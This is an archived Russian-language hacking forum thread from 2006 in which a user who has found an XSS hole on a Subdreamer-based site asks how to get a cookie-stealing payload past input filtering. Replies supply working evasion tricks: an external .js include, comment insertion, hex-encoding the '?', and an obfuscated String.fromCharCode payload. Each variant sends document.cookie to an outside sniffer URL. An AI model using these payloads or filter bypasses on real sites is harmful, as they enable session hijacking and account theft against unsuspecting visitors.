PDA

Просмотр полной версии : Вопрос по Xss

gadjet
03.12.2006, 11:16
Нашел на сайте XSS, однако при подстановке
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
как будто бы обрезается все, что находится после ? и получается следующее:

<link>http://www......ru/<script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg</link>

Как решить эту проблему? Сайт стоит на Subdreamer.
DIAgen
03.12.2006, 21:23
Нашел на сайте XSS, однако при подстановке
>\"><script>img = new Image();img.src=\"http://antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
как будто бы обрезается все, что находится после ? и получается следующее:

<link>http://www......ru/<script>img = new Image();img.src=\"http://antichat.ru/cgi-bin/s.jpg</link>

Как решить эту проблему? Сайт стоит на Subdreamer.

Скачай Subdreamer и посмотри как там идет фильтрация даных и поймешь почему отрезается, а потом уже думай как это обойти

P.S В последних версиях CMS стоит фильтрация +document.cookie
P.S.S Сделай сылку на .js фаил и туда запихни img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
__XT__
04.12.2006, 01:13
не надо не чего скачивать все проги имеют свой алгоритм..лишь твоя голова имеет конструктор алгоритмов.
Ты не написал это активная или пассивная XSS

1) Если активная блин то скорее всего есть проверка на конец строки чтобы было расширение тогда попробуй
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> /1.jpg
и вообще это тупо...юзай готовые тэги и их динамические параметры или высший пилотаж в активных XSS енто вложенные тэги.

Если ты указал пассивную XSS тогда скорее всего идёт проверка на длину строки переменной.
больше симолов н е чем отведенно под неё не вставишь.
Поэтому лучший тут выход будет юзать скрипт с другого ресурса.
к примеру вставить:
<script src=http://qwe.ru/1.js></script>

а на сайте http://qwe.ru/ в 1.js вставить скрипт передачи кукисов:

img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
nc.STRIEM
04.12.2006, 01:33
P.S.S[/B] Сделай сылку на .js фаил и туда запихни img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

только:
img = new/**/ Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
;)
gadjet
04.12.2006, 08:43
<script src=http://qwe.ru/1.js></script>
Пробывал и таким макаром, опять же простое alert(document.cookie) в файле http://qwe.ru/1.js работает, а выражения типа img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; никчему не приводят.
XSS пассивная.
hidden
04.12.2006, 09:02
Если фильтруется символ ? зашифруй его в HEX
img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg\x3F"+document.cookie;
__XT__
04.12.2006, 14:31
1.js
кидай псевдо-дефейс на снифф

document.write(String.fromCharCode(60,115,99,114,1 05,112,116,62,105,109,103,32,61,32,110,101,119,32, 73,109,97,103,101,40,41,59,105,109,103,46,115,114, 99,61,34,104,116,116,112,58,47,47,97,110,116,105,9 9,104,97,116,46,114,117,47,99,103,105,45,98,105,11 0,47,115,46,106,112,103,63,34,43,100,111,99,117,10 9,101,110,116,46,99,111,111,107,105,101,59,32,60,4 7,115,99,114,105,112,116,62))